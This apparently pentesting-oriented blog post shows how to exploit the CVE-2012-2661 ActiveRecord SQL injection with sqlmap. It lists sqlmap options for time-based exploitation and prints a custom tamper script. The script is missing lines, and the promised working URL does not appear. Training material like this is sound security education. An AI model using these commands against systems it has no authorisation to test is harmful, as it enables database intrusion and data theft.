After some work, I managed to get the ActiveRecord bug to work with sqlmap...
First some notes on sqlmap:
- I'm pretty disappointed by how the tamper scripts works, it will be nicer to have access to the full HTTP request instead of just the payload... maybe a patch to submit. If I had full access to the HTTP request, I'd have been able to do a full rewrite from id=1 to the right payload... anyway
- It's really time consuming to do time based exploitation since sqlmap doesn't try to go under 1 second for the sleep()...
So first some options I'm using:
- --tamper tamper/cve-2012-2661.py : My tampering script, see below
- --dbms=Mysql : The back-end is Mysql, no time wasted on other checks
- --technique=T : Time based exploitation only, no time wasted on other checks
- --batch : I don't want to answer questions...
- --proxy=http://127.0.0.1:18080 : Always use a proxy for debugging purpose
- --banner: I just want to dump the version
The tampering script is pretty simple to write:
- You need to make sure the request is unique: I'm using the current time, random isn't unique, time is ;)
- You need to take care of the encoding when using tamper script
And the source code of the tamper script is:
% cat tamper/cve-2012-2661.py
Copyright (c) 2012 pentesterlab (https://www.pentesterlab.com)
from lib.core.enums import PRIORITY
from datetime import datetime
__priority__ = PRIORITY.LOW
retVal = payload
# that's disgusting, encoding =,+,>
retVal = retVal.replace("=","%3d")
retVal = retVal.replace("+","%2b")
retVal = retVal.replace(">","%3e")
# make the request unique
Now, you just need to find the correct URL... and that's the hard part. After a lot of testing, the following URL works:
Now you're able to test and exploit this bug using sqlmap...
If you want to have a real understanding of the vulnerability and not just ./hack ... You should check out PentesterLab's free exercise on this bug: CVE-2012-2661: ActiveRecord SQL injection.